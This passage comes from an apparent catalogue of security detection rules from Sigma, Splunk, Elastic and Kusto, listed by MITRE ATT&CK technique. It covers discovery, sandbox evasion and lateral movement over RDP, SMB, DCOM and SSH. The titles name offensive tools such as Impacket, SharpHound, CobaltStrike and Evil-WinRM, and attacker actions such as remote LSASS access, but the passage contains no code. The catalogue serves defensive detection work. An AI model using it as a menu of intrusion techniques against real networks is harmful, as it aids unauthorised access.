- Splunk Get ADDefaultDomainPasswordPolicy with Powershell production
- Splunk Get ADDefaultDomainPasswordPolicy with Powershell Script Block production
- Splunk Get ADUserResultantPasswordPolicy with Powershell production
- Splunk Get ADUserResultantPasswordPolicy with Powershell Script Block production
- Splunk Get DomainPolicy with Powershell production
- Splunk Get DomainPolicy with Powershell Script Block production
- Sigma HackTool - CrackMapExec Execution test
- Kusto LDAP reconnaissance via search filters
- Sigma Net.EXE Execution test
- Sigma Password policy discovery via commandline
- Sigma Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy test
- Sigma Password Policy Enumerated test
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Windows Account or Group Discovery production
- Splunk Windows Password Policy Discovery with Net production
Browser Information Discovery T1217 4 rules
- Sigma Automated Collection Bookmarks Using Get-ChildItem PowerShell test
- Sigma File And SubFolder Enumeration Via Dir Command test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Suspicious Where Execution test
Domain Trust Discovery T1482 53 rules
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Forest PowerShell class called from a non administrative host experimental
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Kusto Dev-0270 WMIC Discovery available
- Sigma DNS Server Discovery Via LDAP Query test
- Splunk Domain Trust Discovery Commands - Windows (PowerShell)
- Splunk Domain Trust Discovery Commands - Windows (Windows Event Log)
- Sigma Domain Trust Discovery Via Dsquery test
- Splunk DSQuery Domain Discovery production
- Elastic Enumerating Domain Trusts via DSQUERY.EXE production
- Elastic Enumerating Domain Trusts via NLTEST.EXE production
- Splunk Get-DomainTrust with PowerShell production
- Splunk Get-DomainTrust with PowerShell Script Block production
- Splunk Get-ForestTrust with PowerShell production
- Splunk Get-ForestTrust with PowerShell Script Block production
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SharpView Execution test
- Sigma HackTool - TruffleSnout Execution test
- Kusto LDAP reconnaissance via search filters
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Splunk NLTest Domain Trust Discovery production
- Sigma Nltest.EXE Execution test
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Sigma Potential Recon Activity Via Nltest.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- Sigma Renamed AdFind Execution test
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows SOAPHound Binary Execution production
Virtualization/Sandbox Evasion T1497 14 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Splunk Headless Browser Usage production
- Splunk Ping Sleep Batch Command production
- Sigma Powershell Detect Virtualization Environment test
- Splunk Windows Chromium Browser Launched with Small Window Size production
- Splunk Windows Chromium Browser No Security Sandbox Process production
- Splunk Windows Chromium Browser with Custom User Data Directory production
- Splunk Windows Chromium process Launched with Disable Popup Blocking production
- Splunk Windows Chromium Process Launched with Logging Disabled production
- Splunk Windows Chromium Process with Disabled Extensions production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Virtualization/Sandbox Evasion: Time Based Checks T1497.003 4 rules
- Elastic Delayed Execution via Ping production
- Splunk Ping Sleep Batch Command production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Software Discovery T1518 22 rules
- Splunk Application Discovery - Windows (PowerShell)
- Splunk Application Discovery - Windows (Sysmon)
- Splunk Application Discovery - Windows (Windows Event Log)
- Sigma Detected Windows Software Discovery test
- Sigma Detected Windows Software Discovery - PowerShell test
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Sigma Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Security Software Discovery using WMIC production
- Splunk Security Software Discovery via Findstr.exe (PowerShell)
- Splunk Security Software Discovery via Findstr.exe (Sysmon)
- Splunk Security Software Discovery via Findstr.exe (Windows Event Log)
- Sigma Security Software Discovery Via Powershell Script test
- Splunk Security Software Discovery via WMI (PowerShell)
- Splunk Security Software Discovery via WMI (Sysmon)
- Splunk Security Software Discovery via WMI (Windows Event Log)
- Sigma Security Tools Keyword Lookup Via Findstr.EXE test
- Sigma SQL Server database's table enumeration experimental
- Sigma Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE test
- Splunk Windows Software Discovery Via PowerShell production
Software Discovery: Security Software Discovery T1518.001 12 rules
- Sigma Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Security Software Discovery using WMIC production
- Splunk Security Software Discovery via Findstr.exe (PowerShell)
- Splunk Security Software Discovery via Findstr.exe (Sysmon)
- Splunk Security Software Discovery via Findstr.exe (Windows Event Log)
- Sigma Security Software Discovery Via Powershell Script test
- Splunk Security Software Discovery via WMI (PowerShell)
- Splunk Security Software Discovery via WMI (Sysmon)
- Splunk Security Software Discovery via WMI (Windows Event Log)
- Sigma Security Tools Keyword Lookup Via Findstr.EXE test
- Sigma Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE test
Cloud Service Discovery T1526 1 rule
- Sigma PUA - Seatbelt Execution test
System Location Discovery T1614 6 rules
- Sigma Console CodePage Lookup Via CHCP test
- Splunk Discovery using CHCP (Sysmon)
- Splunk Discovery using CHCP (Windows Event Log)
- Elastic External IP Lookup from Non-Browser Process production
- Sigma System Language Discovery via Reg.Exe experimental
- Elastic System Time Discovery production
System Location Discovery: System Language Discovery T1614.001 4 rules
- Sigma Console CodePage Lookup Via CHCP test
- Splunk Discovery using CHCP (Sysmon)
- Splunk Discovery using CHCP (Windows Event Log)
- Sigma System Language Discovery via Reg.Exe experimental
Group Policy Discovery T1615 9 rules
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma Gpresult Display Group Policy Information test
- Elastic Group Policy Discovery via Microsoft GPResult Utility production
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma Potential Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Suspicious GPO Discovery With Get-GPO test
- Sigma Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Splunk Windows WinPEAS PowerShell Script Execution production
Debugger Evasion T1622 1 rule
- Sigma PUA - Process Hacker Execution test
Log Enumeration T1654 1 rule
- Splunk Windows EventLog Recon Activity Using Log Query Utilities production
Lateral Movement
Remote Services T1021 242 rules
- Sigma Access To ADMIN$ Network Share test
- Sigma Active Directory honeypot used for lateral movement experimental
- Splunk Allow Inbound Traffic By Firewall Rule Registry production
- Splunk Allow Inbound Traffic In Firewall Rule production
- Kusto Anomaly in SMB Traffic(ASIM Network Session schema) available
- Elastic At.exe Command Lateral Movement production
- Sigma BaaUpdate.exe Suspicious DLL Load experimental
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- YARA-L Copy From Or To Admin Share Or Sysvol Folder
- Sigma DCERPC SMB Spoolss Named Pipe test
- Sigma DCOM InternetExplorer.Application Iertutil DLL Hijack - Security test
- Kusto DCOM Lateral Movement available
- Sigma DCOM lateral movement (via MMC20) experimental
- Sigma Denied Access To Remote Desktop test
- Sigma Denied RDP login with valid credentials experimental
- Splunk Detect PsExec With accepteula Flag production
- Kusto Detecting Macro Invoking ShellBrowserWindow COM Objects available
- Splunk Enable RDP In Other Port Number production
- Sigma Enable Windows Remote Management test
- Splunk Executable File Written in Administrative SMB Share production
- Sigma Execute Invoke-command on Remote Host test
- Elastic Execution via TSClient Mountpoint production
- Sigma First Time Seen Remote Named Pipe test
- Sigma HackTool - NetExec Execution experimental
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HackTool - Potential Impacket Lateral Movement Activity stable
- Sigma HackTool - SharpMove Tool Execution test
- Sigma HackTool - WinRM Access Via Evil-WinRM test
- Sigma Hermetic Wiper TG Process Patterns test
- Sigma Impacket DCOMexec privilege abuse via MMC experimental
- Sigma Impacket DCOMexec process abuse via MMC experimental
- Splunk Impacket Lateral Movement Activity (Sysmon)
- Splunk Impacket Lateral Movement Activity (Windows Event Log)
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Splunk Impacket PSexec (Windows Event Log)
- Sigma Impacket PsExec Execution test
- Splunk Impacket SMBexec (Windows Event Log)
- Sigma Impacket WMIexec execution via SMB admin share experimental
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Elastic Incoming Execution via PowerShell Remoting production
- Elastic Incoming Execution via WinRM Remote Shell production
- Splunk Interactive Session on Remote Endpoint with PowerShell production
- Splunk Invoke-DCOM.ps1 - PowerShell (PowerShell)
- Splunk Invoke-DCOM.ps1 - PowerShell (Sysmon)
- Splunk Invoke-DCOM.ps1 - PowerShell (Windows Event Log)
- Sigma Lateral movement by mounting a network share - net use (command) experimental
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Kusto Lateral Movement via DCOM available
- Elastic Lateral Movement via Startup Folder production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma Metasploit SMB Authentication test
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share Basic
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With Asset Entity
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Enrichment
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Entity
- Splunk Mmc LOLBAS Execution Process Spawn production
- Sigma MMC Spawning Windows Shell test
- Sigma MMC20 Lateral Movement test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk MSTSC Execution (EDR)
- Splunk MSTSC Execution (Windows Event Log)
- Kusto Multiple RDP connections from Single System
- Sigma Net.EXE Execution test
- Splunk Net.exe Use with URL (Sysmon)
- Splunk Net.exe Use with URL (Windows Event Log)
- Sigma Network share manipulation via commandline
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New network file share created experimental
- Sigma New Remote Desktop Connection Initiated Via Mstsc.EXE test
- Elastic NullSessionPipe Registry Modification production
- Sigma Number of oustanding SMB requests increased experimental
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma OpenSSH native server feature installation experimental
- Sigma OpenSSH Server Listening On Socket test
- Sigma OpenSSH server listening on socket experimental
- Sigma OpenSSH service activation on Windows experimental
- Sigma Outbound RDP Connections Over Non-Standard Tools test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Password Provided In Command Line Of Net.EXE test
- Sigma Port Forwarding Activity Via SSH.EXE test
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack - Image Load test
- Splunk Potential EternalBlue via Metasploit (Windows Event Log)
- Sigma Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp test
- Sigma Potential Lateral Movement via Windows Remote Shell experimental
- Elastic Potential Lateral Tool Transfer via SMB Share production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential Network Share Discovery production
- Elastic Potential Outgoing RDP Connection by Unusual Process production
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Elastic Potential Remote Credential Access via Registry production
- Elastic Potential Remote Desktop Shadowing Activity production
- Sigma Potential Remote Desktop Tunneling test
- Elastic Potential Remote Desktop Tunneling Detected production
- Sigma Potential Remote PowerShell Session Initiated test
- YARA-L Potential Remote PowerShell Session Initiated
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Remote Services Add TrustedHost production
- Sigma Privilege Escalation via Named Pipe Impersonation test
- Sigma Protected Storage Service Access test
- Sigma Psexec Execution test
- Sigma PSexec execution over SMB share experimental
- Elastic PsExec Network Connection production
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Kusto Rare RDP Connections
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Sigma RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class experimental
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Sigma RDP Login from Localhost test
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Kusto RDP Nesting
- Sigma RDP Over Reverse SSH Tunnel test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Sigma RDP to HTTP or HTTPS Target Ports test
- Sigma RDP tunneling configuration enabled for port forwarding experimental
- Sigma RDP tunneling via ngrok detected experimental
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Splunk Remote Desktop Process Running On System experimental
- Kusto Remote Desktop Protocol - SharpRDP available
- Elastic Remote Execution via File Shares production
- Elastic Remote File Copy to a Hidden Share production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Splunk Remote Process Instantiation via DCOM and PowerShell production
- Splunk Remote Process Instantiation via DCOM and PowerShell Script Block production
- Splunk Remote Process Instantiation via WinRM and PowerShell production
- Splunk Remote Process Instantiation via WinRM and PowerShell Script Block production
- Splunk Remote Process Instantiation via WinRM and Winrs production
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Service Activity via SVCCTL Named Pipe test
- Sigma Remote shell execution via SMB admin share experimental
- Elastic Remote Windows Service Installed production
- Elastic Remotely Started Services via RPC production
- Sigma Rundll32 Execution Without Parameters test
- Sigma Rundll32 UNC Path Execution test
- Elastic Service Command Lateral Movement production
- Sigma Shared printer creation (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SMB admin share accessed experimental
- Elastic SMB Connections via LOLBin or Untrusted Process production
- Sigma SMB Create Remote File Admin Share test
- Splunk SMB Write Access on Administrative Share (Windows Event Log)
- Kusto SMB/Windows Admin Shares available
- Sigma smbexec.py Service Installation test
- Sigma Suspicious BitLocker Access Agent Update Utility Execution experimental
- Elastic Suspicious Cmd Execution via WMI production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious New-PSDrive to Admin Share test
- Sigma Suspicious permissions modification on a network share experimental
- Sigma Suspicious Plink Port Forwarding test
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious PsExec Execution test
- Sigma Suspicious RDP Redirect Using TSCON test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Sigma Suspicious Speech Runtime Binary Child Process experimental
- Sigma Suspicious UltraVNC Execution test
- Sigma Suspicious WSMAN Provider Image Loads test
- Sigma T1047 Wmiprvse Wbemcomn DLL Hijack test
- Sigma Turla Group Lateral Movement test
- Sigma Unsigned or Unencrypted SMB Connection to Share Established experimental
- Sigma User Added to Remote Desktop Users Group test
- Sigma Windows Admin Share Mount Via Net.EXE test
- Splunk Windows Admin$ Share Access (Sysmon)
- Splunk Windows Admin$ Share Access (Windows Event Log)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows C$ Share Access (EDR)
- Splunk Windows C$ Share Access (Sysmon)
- Splunk Windows C$ Share Access (Windows Event Log)
- Splunk Windows Default RDP File Creation By Non MSTSC Process production
- Splunk Windows Default Rdp File Unhidden production
- Splunk Windows Excel Spawning Microsoft Project Application production
- Sigma Windows Internet Hosted WebDav Share Mount Via Net.EXE test
- Splunk Windows IPC$ Share Access (Sysmon)
- Splunk Windows IPC$ Share Access (Windows Event Log)
- Splunk Windows MSTSC RDP Commandline production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows Protocol Tunneling with Plink production
- Splunk Windows PUA Named Pipe production
- Splunk Windows PuTTY Suite Utility Execution production
- Splunk Windows RDP Bitmap Cache File Creation production
- Splunk Windows RDP Client Launched with Admin Session production
- Splunk Windows RDP File Execution production
- Splunk Windows RDP Login Session Was Established production
- Splunk Windows RDP Server Registry Entry Created production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Remote Host Computer Management Access production
- Splunk Windows Remote Management Execute Shell production
- Splunk Windows Remote Service Rdpwinst Tool Execution production
- Splunk Windows Remote Services Allow Rdp In Firewall production
- Splunk Windows Remote Services Allow Remote Assistance production
- Splunk Windows Remote Services Rdp Enable production
- Splunk Windows RMM Named Pipe production
- Sigma Windows Share Mount Via Net.EXE test
- Splunk Windows Share Multiple File Access (Windows Event Log)
- Splunk Windows Special Privileged Logon On Multiple Hosts production
- Splunk Windows SpeechRuntime COM Hijacking DLL Load production
- Splunk Windows SpeechRuntime Suspicious Child Process production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Windows Theme File Creation in Unusual Location production
- Sigma WinRM listening service reconnaissance (process) experimental
- Sigma WinRM listening service reconnaissance (WS-Management) experimental
- Kusto WinRM Plugin Lateral Movement
- Splunk WinRM Tools (PowerShell)
- Splunk WinRM Tools (Sysmon)
- Splunk WinRM Tools (Windows Event Log)
- Sigma Winrs Local Command Execution experimental
- Sigma WinRS usage for remote execution
- Elastic WMI Incoming Lateral Movement production
- Elastic WMIC Remote Command production
- Sigma Wmiprvse Wbemcomn DLL Hijack test
- Sigma Wmiprvse Wbemcomn DLL Hijack - File test
- Splunk Wsmprovhost LOLBAS Execution Process Spawn production
Remote Services: Remote Desktop Protocol T1021.001 57 rules
- Splunk Allow Inbound Traffic By Firewall Rule Registry production
- Splunk Allow Inbound Traffic In Firewall Rule production
- Sigma Denied Access To Remote Desktop test
- Sigma Denied RDP login with valid credentials experimental
- Elastic Execution via TSClient Mountpoint production
- Sigma Hermetic Wiper TG Process Patterns test
- Elastic Lateral Movement via Startup Folder production
- Splunk MSTSC Execution (EDR)
- Splunk MSTSC Execution (Windows Event Log)
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New Remote Desktop Connection Initiated Via Mstsc.EXE test
- Sigma Outbound RDP Connections Over Non-Standard Tools test
- Sigma Port Forwarding Activity Via SSH.EXE test
- Elastic Potential Outgoing RDP Connection by Unusual Process production
- Elastic Potential Remote Desktop Shadowing Activity production
- Elastic Potential Remote Desktop Tunneling Detected production
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Sigma RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class experimental
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Sigma RDP Login from Localhost test
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Sigma RDP Over Reverse SSH Tunnel test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Sigma RDP to HTTP or HTTPS Target Ports test
- Sigma RDP tunneling configuration enabled for port forwarding experimental
- Sigma RDP tunneling via ngrok detected experimental
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Splunk Remote Desktop Process Running On System experimental
- Kusto Remote Desktop Protocol - SharpRDP available
- Sigma Suspicious Plink Port Forwarding test
- Sigma Suspicious RDP Redirect Using TSCON test
- Sigma User Added to Remote Desktop Users Group test
- Splunk Windows Default RDP File Creation By Non MSTSC Process production
- Splunk Windows Default Rdp File Unhidden production
- Splunk Windows MSTSC RDP Commandline production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows RDP Bitmap Cache File Creation production
- Splunk Windows RDP Client Launched with Admin Session production
- Splunk Windows RDP File Execution production
- Splunk Windows RDP Login Session Was Established production
- Splunk Windows RDP Server Registry Entry Created production
- Splunk Windows Remote Service Rdpwinst Tool Execution production
- Splunk Windows Remote Services Allow Rdp In Firewall production
- Splunk Windows Remote Services Allow Remote Assistance production
- Splunk Windows Remote Services Rdp Enable production
Remote Services: SMB/Windows Admin Shares T1021.002 97 rules
- Sigma Access To ADMIN$ Network Share test
- Kusto Anomaly in SMB Traffic(ASIM Network Session schema) available
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- YARA-L Copy From Or To Admin Share Or Sysvol Folder
- Sigma DCERPC SMB Spoolss Named Pipe test
- Sigma DCOM InternetExplorer.Application Iertutil DLL Hijack - Security test
- Splunk Detect PsExec With accepteula Flag production
- Splunk Executable File Written in Administrative SMB Share production
- Sigma First Time Seen Remote Named Pipe test
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HackTool - SharpMove Tool Execution test
- Splunk Impacket Lateral Movement Activity (Sysmon)
- Splunk Impacket Lateral Movement Activity (Windows Event Log)
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket PsExec Execution test
- Sigma Impacket WMIexec execution via SMB admin share experimental
- Sigma Lateral movement by mounting a network share - net use (command) experimental
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Lateral Movement via Startup Folder production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma Metasploit SMB Authentication test
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share Basic
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With Asset Entity
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Enrichment
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Entity
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Splunk Net.exe Use with URL (Sysmon)
- Splunk Net.exe Use with URL (Windows Event Log)
- Sigma Network share manipulation via commandline
- Sigma New network file share created experimental
- Elastic NullSessionPipe Registry Modification production
- Sigma Number of oustanding SMB requests increased experimental
- Sigma Password Provided In Command Line Of Net.EXE test
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack - Image Load test
- Splunk Potential EternalBlue via Metasploit (Windows Event Log)
- Elastic Potential Lateral Tool Transfer via SMB Share production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential Network Share Discovery production
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Sigma Protected Storage Service Access test
- Sigma PSexec execution over SMB share experimental
- Elastic PsExec Network Connection production
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Elastic Remote Execution via File Shares production
- Elastic Remote File Copy to a Hidden Share production
- Sigma Remote Service Activity via SVCCTL Named Pipe test
- Sigma Remote shell execution via SMB admin share experimental
- Elastic Remote Windows Service Installed production
- Sigma Rundll32 Execution Without Parameters test
- Sigma Rundll32 UNC Path Execution test
- Elastic Service Command Lateral Movement production
- Sigma Shared printer creation (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SMB admin share accessed experimental
- Elastic SMB Connections via LOLBin or Untrusted Process production
- Sigma SMB Create Remote File Admin Share test
- Splunk SMB Write Access on Administrative Share (Windows Event Log)
- Kusto SMB/Windows Admin Shares available
- Sigma smbexec.py Service Installation test
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious New-PSDrive to Admin Share test
- Sigma Suspicious permissions modification on a network share experimental
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious PsExec Execution test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Sigma T1047 Wmiprvse Wbemcomn DLL Hijack test
- Sigma Turla Group Lateral Movement test
- Sigma Unsigned or Unencrypted SMB Connection to Share Established experimental
- Sigma Windows Admin Share Mount Via Net.EXE test
- Splunk Windows Admin$ Share Access (Sysmon)
- Splunk Windows Admin$ Share Access (Windows Event Log)
- Splunk Windows C$ Share Access (EDR)
- Splunk Windows C$ Share Access (Sysmon)
- Splunk Windows C$ Share Access (Windows Event Log)
- Sigma Windows Internet Hosted WebDav Share Mount Via Net.EXE test
- Splunk Windows IPC$ Share Access (Sysmon)
- Splunk Windows IPC$ Share Access (Windows Event Log)
- Splunk Windows PUA Named Pipe production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows RMM Named Pipe production
- Sigma Windows Share Mount Via Net.EXE test
- Splunk Windows Share Multiple File Access (Windows Event Log)
- Splunk Windows Special Privileged Logon On Multiple Hosts production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Windows Theme File Creation in Unusual Location production
- Sigma Wmiprvse Wbemcomn DLL Hijack test
- Sigma Wmiprvse Wbemcomn DLL Hijack - File test
Remote Services: Distributed Component Object Model T1021.003 38 rules
- Sigma BaaUpdate.exe Suspicious DLL Load experimental
- Sigma DCOM InternetExplorer.Application Iertutil DLL Hijack - Security test
- Kusto DCOM Lateral Movement available
- Sigma DCOM lateral movement (via MMC20) experimental
- Kusto Detecting Macro Invoking ShellBrowserWindow COM Objects available
- Sigma HackTool - Potential Impacket Lateral Movement Activity stable
- Sigma Impacket DCOMexec privilege abuse via MMC experimental
- Sigma Impacket DCOMexec process abuse via MMC experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Splunk Invoke-DCOM.ps1 - PowerShell (PowerShell)
- Splunk Invoke-DCOM.ps1 - PowerShell (Sysmon)
- Splunk Invoke-DCOM.ps1 - PowerShell (Windows Event Log)
- Kusto Lateral Movement via DCOM available
- Splunk Mmc LOLBAS Execution Process Spawn production
- Sigma MMC Spawning Windows Shell test
- Sigma MMC20 Lateral Movement test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack - Image Load test
- Sigma Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Remote Process Instantiation via DCOM and PowerShell production
- Splunk Remote Process Instantiation via DCOM and PowerShell Script Block production
- Sigma Suspicious BitLocker Access Agent Update Utility Execution experimental
- Elastic Suspicious Cmd Execution via WMI production
- Sigma Suspicious Speech Runtime Binary Child Process experimental
- Sigma Suspicious WSMAN Provider Image Loads test
- Splunk Windows Excel Spawning Microsoft Project Application production
- Splunk Windows SpeechRuntime COM Hijacking DLL Load production
- Splunk Windows SpeechRuntime Suspicious Child Process production
- Elastic WMI Incoming Lateral Movement production
- Elastic WMIC Remote Command production
Remote Services: SSH T1021.004 10 rules
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma OpenSSH native server feature installation experimental
- Sigma OpenSSH Server Listening On Socket test
- Sigma OpenSSH server listening on socket experimental
